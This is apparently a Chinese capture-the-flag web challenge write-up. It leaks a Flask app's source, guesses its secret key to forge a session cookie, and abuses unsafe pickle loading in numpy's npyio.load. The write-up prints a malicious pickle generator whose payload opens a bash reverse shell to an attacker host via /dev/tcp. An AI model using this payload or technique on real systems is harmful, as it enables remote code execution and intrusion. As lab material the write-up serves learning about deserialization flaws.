Web

访问看见在url里看见/?destination=index.html，源码里也提示run.py，访问/?destination=run.py可以得到源码：

# -*- coding: utf-8 -*-
'''
-------------------------------------------------
    File name :    run.py
    Description : 用于启动 pro-system app
    Author :      RGDZ
    Date :    2019/04/30
-------------------------------------------------
    Version : v1.0
    Contact :   rgdz.gzu@qq.com
    License :   (C)Copyright 2018-2019
-------------------------------------------------
'''


# here put the import lib

from datetime import timedelta

from numpy.lib import npyio
from flask import Flask, render_template, redirect, session, request, url_for, jsonify


app = Flask(__name__)
app.config['SECRET_KEY'] = "KEY_SECRET_PWN_H**"
app.config['PERMANENT_SESSION_LIFETIME']=timedelta(days=7)


@app.route('/')
def index():
    destination = request.args.get('destination')
    session["username"] = "Agent Smith"
    # session["username"] = "Ne*"
    return render_template([destination])

@app.route('/matrix/',methods=['GET', "POST"])
def matrix():
    if request.method != "GET":
        if session.get("username") != "Ne*":
            return u"Matrix discover you, so, you died..."
        npy = request.files.get("npy")
        npyio.load(npy)
    return render_template(["matrix.html"])

@app.route('/findRedeemer/',methods=['GET'])
def upload():
    username = session.get("username")
    if username == "Ne*":
        return jsonify(True)
    return jsonify(False)

if __name__ == "__main__":
    app.run(debug=True,
    host="0.0.0.0",
    port=80
    )

访问/matrix/有个上传界面，当然是校验session。

有个/findRedeemer/来帮助伪造username。
SECRET_KEY可以猜测出是KEY_SECRET_PWN_HUB。
然后有源码可以用flask-cookie-session-manager或者自己本地起一个flask访问下就有了。
然后npyio有个反序列化漏洞，网上也有poc，可以构造：

import pickle
import os
class test(object):
    def __reduce__(self):
        s = """bash -c 'sh -i &>/dev/tcp/[VPS]/55555 0>&1'"""
        return os.system, (s,)

evil = pickle.dumps(test())
with open('a.test', 'wb') as f:
    f.write(evil)

上传生成的a.test：